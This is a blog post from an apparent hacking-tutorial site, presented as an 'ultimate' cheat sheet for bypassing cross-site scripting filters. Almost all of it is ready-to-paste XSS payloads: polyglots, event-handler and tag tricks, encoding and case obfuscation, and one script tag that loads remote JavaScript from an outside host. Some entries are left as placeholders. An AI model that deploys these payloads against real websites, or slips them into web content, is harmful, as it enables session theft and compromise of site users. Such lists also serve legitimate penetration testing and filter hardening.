Hacking Tutorials XSS

XSS Filter Bypass Cheat Sheet

As I promised here is the ultimate cheat sheet for bypassing XSS filters.
If you don’t understand what I am saying than you should read these articles:

1. Cross Site Scripting (XSS) : Getting Started
2. Bypassing XSS Filters : Part 1
3. Bypassing XSS Filters : Part 2

Quick XSS Payloads

You can use these payloads when you want to quickly check for XSS in a webpge.

Filter Check
It will check which characters are being filter. It also checks if <script>
tag is blocked or not.

/"'`\<><script>:;

XSS Tester: Alert XSS Statment
This payload will try to close tags and bypass basic filters to execute an alert box.

';</script>">'><SCrIPT>alert(String.fromCharCode(88,83,83))</scRipt>

XSS Polyglot 1
It is my custom payload which tries to bypass basic filters by closing tags and using different types of payloads.

';'>"><marquee>test</marquee><plaintext/onmouseover=prompt(test)>
<img src="https://teamultimate.in/wp-content/uploads/2017/03/slide-main.png">
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

XSS Polyglot 2

//'/<@/></script></div></script>--><select */onclick=alert()><o>1<o>2')//"<!--

XSS Polyglot 3

<svg onload="void 'javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d
%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e'; "></svg>

List Of Payloads

Without quotes and semicolons
Use when quotes and semicolons are being filtered.

<IMG SRC=javascript:alert('XSS')>

Without any quotes

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

Defeats tag checking

<<SCRIPT>alert("test");//<</SCRIPT>

Without closing tag

<SCRIPT SRC=https://xss.rocks/xss.js?< B >

Using body tag

<BODY ONLOAD=alert('XSS')>

Using video tag

<video src=_ onloadstart="alert(1)">

Using table tag

<TABLE BACKGROUND="javascript:alert('XSS')">

Closing script tag

</script><script>alert(1)</script>

When script tag is being filtered

</script><script>alert(1)</script>

Triple URL Encoding

<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>

JS-F**CK Payload

<img/src="x"/onerror="[boom]">

Using On wheel event with body tag

<body style="height:1000px" onwheel="[DATA]">

Using (&NewLine;) and (&NewTab;) with <a> tag

<a href="j[785 bytes of (&NewLine;&Tab;)]avascript:alert(1);">XSS</a>

Using OnDrag with Unicode Encoding

--><d/ /ondrag=co\u006efir\u006d(2)>hello.

Spaces and meta chars before the JavaScript in images for XSS

<IMG SRC=" &#14;  javascript:alert('XSS');">

Here are some other payloads:

"><img src=x onerror=prompt(1)>
"><svg/onload=prompt(1)>
"><iframe/src=javascript:prompt(1)>
"><h1 onclick=prompt(1)>Clickme</h1>
"><a href=javascript:prompt(1)>Clickme</a>
"><a href="javascript:confirm%28 1%29">Clickme</a>
"><a href="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+">click</a>
"><textarea autofocus onfocus=prompt(1)>
"><a/href=javascript&colon;co\u006efir\u006d&#40;&quot;1&quot;&#41;>clickme</a>
"><script>co\u006efir\u006d`1`</script>
"><ScRiPt>co\u006efir\u006d`1`</ScRiPt>
"><img src=x onerror=co\u006efir\u006d`1`>
"><svg/onload=co\u006efir\u006d`1`>
"><iframe/src=javascript:co\u006efir\u006d%28 1%29>
"><h1 onclick=co\u006efir\u006d(1)>Clickme</h1>
"><a href=javascript:prompt%28 1%29>Clickme</a>
"><a href="javascript:co\u006efir\u006d%28 1%29">Clickme</a>
"><textarea autofocus onfocus=co\u006efir\u006d(1)>
"><details/ontoggle=co\u006efir\u006d`1`>clickmeonchrome
"><p/id=1%0Aonmousemove%0A=%0Aconfirm`1`>hoveme
"><img/src=x%0Aonerror=prompt`1`>
"><iframe srcdoc="&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;">
"><h1/ondrag=co\u006efir\u006d`1`)>DragMe</h1>

The list ends here but I will add more payloads later.
Thanks for reading.
Also Read: How I Hacked Someone With Phishing Who Was Aware About Phishing


Browse Categories:

Subscribe Now

Get the latest post directly into your inbox.

Thank you for subscribing.

Something went wrong.